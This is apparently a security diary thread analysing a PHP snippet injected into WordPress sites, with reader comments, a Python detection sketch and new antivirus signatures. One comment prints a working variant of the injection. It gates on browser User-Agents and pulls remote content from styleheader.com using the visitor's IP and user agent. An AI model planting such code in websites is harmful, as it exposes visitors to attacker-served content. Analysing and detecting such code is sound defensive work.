Thanks to one of our readers for sending us this snippet of PHP he found on a WordPress server (I added some line breaks and comments in red for readability):
# or try fopen as a last resort
# The data retrieved will be echoed back to the user if it starts with the string "scr".
I haven't been able to retrieve any content from errorcontent.com. Has anybody else seen this code, or is able to retrieve content from errorcontent.com? According to whois, errorcontent.com is owned by a Chinese organization. It currently resolves to 37.1.207.26, which is owned by a British ISP. Any help as to the nature of this snippet will be appreciated.
Johannes (ISC Handler), May 26th 2015
I found this very old pastie which also refers to errorcontent.com (Jan 2014):
pastebin.com/…
Seems to be the same code...
/x
Xme (ISC Handler), May 26th 2015
The 6-character code is an identifier of the variation of the malware. Here's another example. Same format, different host, 6-code, and variable name. Points back at the same IP though.
$ host styleheader.com
styleheader.com has address 37.1.207.26
styleheader.com mail is handled by 10 mail.styleheader.com.

#19f955#
error_reporting(0); ini_set('display_errors',0);
$wp_uzlk8990 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_uzlk8990) && !preg_match ('/bot/i', $wp_uzlk8990))){
$wp_uzlk098990="http://"."style"."header".".com/header"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_uzlk8990);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_uzlk098990); curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$wp_8990uzlk = curl_exec ($ch); curl_close($ch);}
...
Maarten, May 27th 2015
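A sketch of a file check keyed to the traits visible in the sample above: the 6-character marker, the browser-only User-Agent gate, and a URL split into concatenated string literals. This is an added example, not code from the thread and not the Sanesecurity signatures; the function names, the sample's marker and the host c2.example are constructed, and treating the marker as hex is an assumption based on the one value shown.

```python
import re

# Constructed sample shaped like the snippet in the thread. The marker value and
# the host (reserved name c2.example) are made up for this example.
SAMPLE = r'''<?php
#a1b2c3#
error_reporting(0); ini_set('display_errors',0);
$wp_x = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_x) && !preg_match ('/bot/i', $wp_x))){
$wp_u="http://"."c2".".exam"."ple/header"."/?ip=".$_SERVER['REMOTE_ADDR']."&ua=".urlencode($wp_x);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_u);
$wp_r = curl_exec ($ch); curl_close($ch);}
'''

# Assumption: the 6-character variant code is hex, as in the one marker shown.
MARKER = re.compile(r'#([0-9a-f]{6})#')
UA_GATE = re.compile(r"preg_match\s*\(\s*'/Gecko\|MSIE/i'")
BOT_SKIP = re.compile(r"!\s*preg_match\s*\(\s*'/bot/i'")
# Two or more double-quoted literals joined by PHP's "." operator.
CONCAT = re.compile(r'"[^"$\\]*"(?:\s*\.\s*"[^"$\\]*")+')
URL_HOST = re.compile(r'https?://([^/?]+)', re.I)

def split_hosts(php):
    """Hosts of URLs that only appear once the split literals are rejoined."""
    hosts = set()
    for run in CONCAT.finditer(php):
        joined = "".join(re.findall(r'"([^"]*)"', run.group(0)))
        m = URL_HOST.match(joined)
        if m:
            hosts.add(m.group(1).lower())
    return sorted(hosts)

def scan(php):
    """Report which traits of the injected block are present in a PHP source string."""
    return {
        "markers": MARKER.findall(php),
        "ua_gate": bool(UA_GATE.search(php) and BOT_SKIP.search(php)),
        "errors_silenced": "error_reporting(0)" in php,
        "curl_fetch": "curl_exec" in php,
        "split_hosts": split_hosts(php),
    }

def is_suspect(php):
    """Flag a file that gates on browser User-Agents and fetches from a split-up URL."""
    r = scan(php)
    return r["ua_gate"] and r["curl_fetch"] and bool(r["split_hosts"])

if __name__ == "__main__":
    print(scan(SAMPLE), is_suspect(SAMPLE))
```

Because the host and variable names change between variants, the check relies on the structure of the block rather than on any one domain; the rejoined hosts it reports can then be compared across files.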
Added detection to phish.ndb:
Sanesecurity.Malware.25170.PhpBot
Sanesecurity.Malware.25175.PhpBot

Cheers for the samples,
Steve
Sanesecurity.com
Sanesecurity, May 27th 2015